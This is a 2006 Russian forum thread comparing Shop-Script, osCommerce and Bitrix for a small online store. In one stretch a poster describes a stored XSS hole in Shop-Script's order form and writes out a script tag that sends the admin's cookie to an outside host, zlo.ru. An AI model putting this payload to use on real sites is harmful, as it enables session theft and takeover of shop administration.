Подскажите. Мне предлагают изготовить ИМ купив скрипты на http://www.shop-script.ru. Хорошо это или плохо? Нужен простой ИМ.
19/02/2006
www.lanita.ru
А шопскрипт и уродовать не надо. Стоит уйти с 1 странички в каталог - как видим стандартный шаблон шопскрипта.
А шопскрипт и уродовать не надо. Стоит уйти с 1 странички в каталог - как видим стандартный шаблон шопскрипта.
23/02/2006
Внешний вид шоп-скрипта меняется несложными манипуляция с шаблонами, при этом знание PHP не требуется... Сколько раз пытался натянуть дизайн на оскомерц... намного дольше и обязательно где-нибудь косяк будет. Особенно если не читый оскомерц, а с модулями, а ведь именно с модулями он и нужен, которые, кстати, тоже не всегда ровными руками написаны.
05/03/2006
Мне тоже требуется доработка и доведение шоп-скрипта до ума) версия не самая новая- осенняя-кто-то тут уже переделывал..в итоге быстрый заказ не работает- и уведомление по почте о регистрации пустое..
09/03/2006
Подведем итоги?))
Шоп скрипт гибче и легче в доводке. Под ОсКОмм существует офигительная куча написанных расширений.
Кто что скажет про Битрикс?
Шоп скрипт гибче и легче в доводке. Под ОсКОмм существует офигительная куча написанных расширений.
Кто что скажет про Битрикс?
10/03/2006
Да не нужен вам ЖОП-СКРИПТ, люди! =) Это же просто дыра. Могу здесь написать подробнейший мануал по взлому, если владельцы ругаться не будут =)
10/03/2006
Из готовых и недорогих магазинов , который вам подойдет - посомтрите www.eru.biz - там аренда настроенного и готового к продажам магазина начинается с 1$
10/03/2006
2 Внимательный.
Это титульная странице на хтм, на www.lanita.ru ещё много проектов на поддоменах. Натягивать, например, знакомства на шоп-скрипт смысла не вижу.
Это титульная странице на хтм, на www.lanita.ru ещё много проектов на поддоменах. Натягивать, например, знакомства на шоп-скрипт смысла не вижу.
10/03/2006
Рассказываю =))
Баг 1.
В любое поле оформления заказа (например, имя клиента) пишем: <script>alert()</script>
При просмотре заказа у админа вылетит вот такой алерт. Исходя из этого понимаем, что можем в лёгкую получить админский кукис, а именно (примерно так) :
<script>document:write( <img width=1 heght=1 src="http:\\zlo.ru/zlo.jpg? +document.cookie+ "> );</script>
Это если по простому =)) Через xss.
Баг 1.
В любое поле оформления заказа (например, имя клиента) пишем: <script>alert()</script>
При просмотре заказа у админа вылетит вот такой алерт. Исходя из этого понимаем, что можем в лёгкую получить админский кукис, а именно (примерно так) :
<script>document:write( <img width=1 heght=1 src="http:\\zlo.ru/zlo.jpg? +document.cookie+ "> );</script>
Это если по простому =)) Через xss.
10/03/2006
Кому надо - в почту. Расскажу ещё пару багов ) Там самая прикольная тема - нет никакого шифрования, всё лежит в базе в открытом виде.
10/03/2006
А на сервере, откуда тянется картинка размещаем скрипт на перле. Тут код приводить не буду, заинтересовавшимся - в почту =)
11/03/2006
Скрипт это конечно хорошо. Но лучше, когда в магазине продумано все вплоть до логистики и возможности приема оплаты. Причем не только разными способами, но и в любой валюте в любой стране. Да и по цене получается недорого.
Ответить